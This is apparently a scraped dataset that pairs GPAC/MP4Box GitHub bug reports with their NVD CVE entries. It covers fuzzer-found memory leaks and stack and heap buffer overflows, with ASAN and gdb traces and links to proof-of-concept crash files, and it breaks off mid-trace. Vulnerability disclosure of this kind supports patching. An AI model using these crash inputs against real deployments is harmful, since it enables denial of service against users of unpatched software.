System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (master 6ada10e) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-memory-leak ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/POC-memory-leak ASAN info: ```C ==26273==ERROR: LeakSanitizer: detected memory leaks Direct leak of 80 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xad2eed in dinf_New isomedia/box_code_base.c:945 Indirect leak of 160 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02961 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98961) #1 0x46c43a in realloc_chain utils/list.c:622 #2 0x46c43a in gf_list_add utils/list.c:629 Indirect leak of 96 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xad1d0d in url_New isomedia/box_code_base.c:575 Indirect leak of 80 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xad318d in dref_New isomedia/box_code_base.c:1005 Indirect leak of 32 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x46c27d in gf_list_new utils/list.c:602 SUMMARY: AddressSanitizer: 448 byte(s) leaked in 10 allocation(s). ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu([email protected]) 、Yanhao and Marsman1996([email protected])
AddressSanitizer: a memory leak of dinf_New()
https://api.github.com/repos/gpac/gpac/issues/1321/comments
2
2019-10-28T16:03:11Z
2020-01-08T12:43:28Z
https://github.com/gpac/gpac/issues/1321
513,400,465
1,321
CVE-2019-20160
2019-12-31T00:15:12.337
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a stack-based buffer overflow in the function av1_parse_tile_group() in media_tools/av_parsers.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1334" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1334
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-av1_parse_tile_group ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-av1_parse_tile_group gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x00000000005a375b in av1_parse_tile_group () (gdb) bt #0 0x00000000005a375b in av1_parse_tile_group () #1 0x00000000005ad18b in gf_media_aom_av1_parse_obu () #2 0x00000000004fe4ce in av1c_Read () #3 0x000000010000100a in ?? () #4 0x000000010000100b in ?? () #5 0x000000010000100c in ?? () #6 0x000000010000100d in ?? () #7 0x000000010000100e in ?? () #8 0x000000010000100f in ?? () #9 0x0000000100001010 in ?? () #10 0x0000000100001011 in ?? () #11 0x0000000100001012 in ?? () #12 0x0000000100001013 in ?? () #13 0x0000000100001014 in ?? () ``` ASAN info: ```C [iso file] Box "dinf" (start 773) has 20 extra bytes [iso file] Missing DataInformationBox [iso file] Box "minf" (start 745) has 458 extra bytes [iso file] Box "mdia" is larger than container box [iso file] Track with no sample table ! [iso file] Track with no sample description box ! [iso file] Box "trak" size 264 (start 553) invalid (read 714) [iso file] Box "svcC" size 60 (start 919) invalid (read 126) [iso file] Box "avcC" (start 979) has 9 extra bytes [iso file] Box "avcC" (start 1003) has 81 extra bytes [iso file] extra box avcC found in avc1, deleting [iso file] Unknown box type av1C in parent avc1 [iso file] Unknown box type stsz in parent avc1 [iso file] Unknown box type stco in parent avc1 [iso file] Box "UNKN" is larger than container box [iso file] Box "avc1" size 402 (start 833) invalid (read 414) [iso file] Box "avc1" is larger than container box [iso file] Box "stsd" size 162 (start 817) invalid (read 418) [iso file] Box "avcC" (start 979) has 9 extra bytes [iso file] Box "avcC" (start 1003) has 81 extra bytes ================================================================= ==25824==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffff8278 at pc 0x00000082ff06 bp 0x7ffffffef7a0 sp 0x7ffffffef790 WRITE of size 4 at 0x7fffffff8278 thread T0 #0 0x82ff05 in av1_parse_tile_group media_tools/av_parsers.c:3845 #1 0x840f2f in av1_parse_frame media_tools/av_parsers.c:3882 #2 0x840f2f in gf_media_aom_av1_parse_obu media_tools/av_parsers.c:3969 #3 0x69909c in av1c_Read isomedia/avc_ext.c:2651 #4 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #5 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #6 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #7 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #8 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #9 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #10 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #11 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #12 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) Address 0x7fffffff8278 is located in stack of thread T0 at offset 35160 in frame #0 0x69889f in av1c_Read isomedia/avc_ext.c:2608 This frame has 3 object(s): [32, 36) 'obu_type' [96, 104) 'obu_size' [160, 35112) 'state' <== Memory access at offset 35160 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow media_tools/av_parsers.c:3845 av1_parse_tile_group Shadow bytes around the buggy address: 0x10007fff6ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10007fff7040: 00 00 00 00 00 00 00 00 00 f4 f4 f4 f3 f3 f3[f3] 0x10007fff7050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 0x10007fff7060: f1 f1 00 00 f4 f4 f3 f3 f3 f3 00 00 00 00 00 00 0x10007fff7070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7090: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==25824==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu([email protected]) 、Yanhao and Marsman1996([email protected])
AddressSanitizer: stack-buffer-overflow in av1_parse_tile_group media_tools/av_parsers.c:3845
https://api.github.com/repos/gpac/gpac/issues/1334/comments
2
2019-11-09T11:22:06Z
2020-01-08T12:45:14Z
https://github.com/gpac/gpac/issues/1334
520,394,957
1,334
CVE-2019-20161
2019-12-31T00:15:12.417
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is heap-based buffer overflow in the function ReadGF_IPMPX_WatermarkingInit() in odf/ipmpx_code.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1320" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1320
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (master 6ada10e) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-ReadGF_IPMPX_WatermarkingInit ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/POC-ReadGF_IPMPX_WatermarkingInit ASAN info: ```C ==26293==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efb1 at pc 0x7ffff6ef6904 bp 0x7fffffff7e90 sp 0x7fffffff7638 WRITE of size 40 at 0x60200000efb1 thread T0 #0 0x7ffff6ef6903 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c903) #1 0x4709b5 in memcpy /usr/include/x86_64-linux-gnu/bits/string3.h:53 #2 0x4709b5 in gf_bs_read_data utils/bitstream.c:461 #3 0x7bc40d in ReadGF_IPMPX_WatermarkingInit odf/ipmpx_code.c:1517 #4 0x7bc40d in GF_IPMPX_ReadData odf/ipmpx_code.c:2020 #5 0x7beab7 in gf_ipmpx_data_parse odf/ipmpx_code.c:293 #6 0x7a97c9 in gf_odf_read_ipmp odf/odf_code.c:2426 #7 0x795b43 in gf_odf_parse_descriptor odf/descriptors.c:159 #8 0x7afa76 in gf_odf_desc_read odf/odf_codec.c:302 #9 0xad3e13 in esds_Read isomedia/box_code_base.c:1256 #10 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #11 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #12 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #13 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #14 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #15 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #16 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan/applications/mp4box/main.c:4767 #17 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #18 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) 0x60200000efb1 is located 0 bytes to the right of 1-byte region [0x60200000efb0,0x60200000efb1) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7bc3bf in ReadGF_IPMPX_WatermarkingInit odf/ipmpx_code.c:1516 #2 0x7bc3bf in GF_IPMPX_ReadData odf/ipmpx_code.c:2020 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy Shadow bytes around the buggy address: 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c047fff9df0: fa fa fa fa fa fa[01]fa fa fa 00 00 fa fa 00 00 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==26293==ABORTING ``` gdb info: ```C 7ffff70cd000-7ffff72cc000 ---p 00016000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cc000-7ffff72cd000 rw-p 00015000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cd000-7ffff748d000 r-xp 00000000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff748d000-7ffff768d000 ---p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff768d000-7ffff7691000 r--p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7691000-7ffff7693000 rw-p 001c4000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7693000-7ffff7697000 rw-p 00000000 00:00 0 7ffff7697000-7ffff76b0000 r-xp 00000000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff76b0000-7ffff78af000 ---p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78af000-7ffff78b0000 r--p 00018000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b0000-7ffff78b1000 rw-p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b1000-7ffff79b9000 r-xp 00000000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff79b9000-7ffff7bb8000 ---p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb8000-7ffff7bb9000 r--p 00107000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb9000-7ffff7bba000 rw-p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bba000-7ffff7bd2000 r-xp 00000000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7bd2000-7ffff7dd1000 ---p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd1000-7ffff7dd2000 r--p 00017000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd2000-7ffff7dd3000 rw-p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd3000-7ffff7dd7000 rw-p 00000000 00:00 0 7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7fe3000-7ffff7fe8000 rw-p 00000000 00:00 0 7ffff7ff7000-7ffff7ff8000 rw-p 00000000 00:00 0 7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar] 7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso] 7ffff7ffc000-7ffff7ffd000 r--p 00025000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffd000-7ffff7ffe000 rw-p 00026000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] Program received signal SIGABRT, Aborted. 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1 0x00007ffff730402a in __GI_abort () at abort.c:89 #2 0x00007ffff73447ea in __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0x7ffff745ded8 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 #3 0x00007ffff734d37a in malloc_printerr (ar_ptr=<optimized out>, ptr=<optimized out>, str=0x7ffff745df50 "free(): invalid next size (fast)", action=3) at malloc.c:5006 #4 _int_free (av=<optimized out>, p=<optimized out>, have_lock=0) at malloc.c:3867 #5 0x00007ffff735153c in __GI___libc_free (mem=<optimized out>) at malloc.c:2968 #6 0x0000000000568b82 in DelGF_IPMPX_OpaqueData (_p=<optimized out>) at odf/ipmpx_code.c:1205 #7 gf_ipmpx_data_del (_p=_p@entry=0x9cc760) at odf/ipmpx_code.c:1835 #8 0x00000000005624bd in gf_odf_del_ipmp (ipmp=0x9cc670) at odf/odf_code.c:2390 #9 0x000000000055a031 in gf_odf_parse_descriptor (bs=bs@entry=0x9cc610, desc=desc@entry=0x9cc578, desc_size=desc_size@entry=0x7fffffff9694) at odf/descriptors.c:176 #10 0x0000000000564f7b in gf_odf_desc_read (raw_desc=raw_desc@entry=0x9cc590 "\v@\377\377\377\377", descSize=descSize@entry=108, outDesc=outDesc@entry=0x9cc578) at odf/odf_codec.c:302 #11 0x00000000006ca6f4 in esds_Read (s=0x9cc550, bs=0x9cb460) at isomedia/box_code_base.c:1256 #12 0x00000000005137e1 in gf_isom_box_read (bs=0x9cb460, a=0x9cc550) at isomedia/box_funcs.c:1528 #13 gf_isom_box_parse_ex (outBox=outBox@entry=0x7fffffff9800, bs=bs@entry=0x9cb460, is_root_box=is_root_box@entry=GF_TRUE, parent_type=0) at isomedia/box_funcs.c:208 #14 0x0000000000513e15 in gf_isom_parse_root_box (outBox=outBox@entry=0x7fffffff9800, bs=0x9cb460, bytesExpected=bytesExpected@entry=0x7fffffff9850, progressive_mode=progressive_mode@entry=GF_FALSE) at isomedia/box_funcs.c:42 #15 0x000000000051b4fe in gf_isom_parse_movie_boxes (mov=mov@entry=0x9cb010, bytesMissing=bytesMissing@entry=0x7fffffff9850, progressive_mode=progressive_mode@entry=GF_FALSE) at isomedia/isom_intern.c:206 #16 0x000000000051c48c in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, bytesMissing=0x7fffffff9850, mov=0x9cb010) at isomedia/isom_intern.c:194 #17 gf_isom_open_file (fileName=0x7fffffffe627 "./real-crashs/POC-ReadGF_IPMPX_WatermarkingInit", OpenMode=0, tmp_dir=0x0) at isomedia/isom_intern.c:615 #18 0x000000000041c082 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at main.c:4767 #19 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe358, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe348) at ../csu/libc-start.c:291 #20 0x000000000040eba9 in _start () ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu([email protected]) 、Yanhao and Marsman1996([email protected])
AddressSanitizer: heap-buffer-overflow in ReadGF_IPMPX_WatermarkingInit at ipmpx_code.c:1517
https://api.github.com/repos/gpac/gpac/issues/1320/comments
2
2019-10-28T15:50:52Z
2020-01-08T12:43:16Z
https://github.com/gpac/gpac/issues/1320
513,392,746
1,320
CVE-2019-20162
2019-12-31T00:15:12.507
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is heap-based buffer overflow in the function gf_isom_box_parse_ex() in isomedia/box_funcs.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1327" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1327
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-gf_isom_box_parse_ex ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-gf_isom_box_parse_ex https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-gf_isom_box_parse_ex-2 For POC-new-gf_isom_box_parse_ex gdb info: ```C Program received signal SIGSEGV, Segmentation fault. __GI___libc_free (mem=0x6a06e81bf20d02) at malloc.c:2951 2951 malloc.c: No such file or directory. (gdb) bt #0 __GI___libc_free (mem=0x6a06e81bf20d02) at malloc.c:2951 #1 0x00000000006d4ab7 in reftype_del () #2 0x0000000000512a7d in gf_isom_box_del () #3 0x00000000005135fe in gf_isom_box_array_read_ex () #4 0x00000000005137e1 in gf_isom_box_parse_ex.constprop () #5 0x0000000000513e15 in gf_isom_parse_root_box () #6 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #7 0x000000000051c48c in gf_isom_open_file () #8 0x000000000041c082 in mp4boxMain () #9 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:291 #10 0x000000000040eba9 in _start () ``` For POC-new-gf_isom_box_parse_ex-2 gdb info: ```C Program received signal SIGSEGV, Segmentation fault. __GI___libc_free (mem=0x1c1c1c1c1c1c1c1c) at malloc.c:2951 2951 malloc.c: No such file or directory. (gdb) bt #0 __GI___libc_free (mem=0x1c1c1c1c1c1c1c1c) at malloc.c:2951 #1 0x00000000006d4ab7 in reftype_del () #2 0x0000000000512a7d in gf_isom_box_del () #3 0x00000000005135fe in gf_isom_box_array_read_ex () #4 0x00000000005137e1 in gf_isom_box_parse_ex.constprop () #5 0x0000000000513e15 in gf_isom_parse_root_box () #6 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #7 0x000000000051c48c in gf_isom_open_file () #8 0x000000000041c082 in mp4boxMain () #9 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:291 #10 0x000000000040eba9 in _start () ``` For POC-new-gf_isom_box_parse_ex ASAN info: ```C ==25783==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000df80 at pc 0x0000006c4392 bp 0x7fffffff8090 sp 0x7fffffff8080 WRITE of size 4 at 0x60400000df80 thread T0 #0 0x6c4391 in gf_isom_box_parse_ex isomedia/box_funcs.c:189 #1 0x6c47bc in 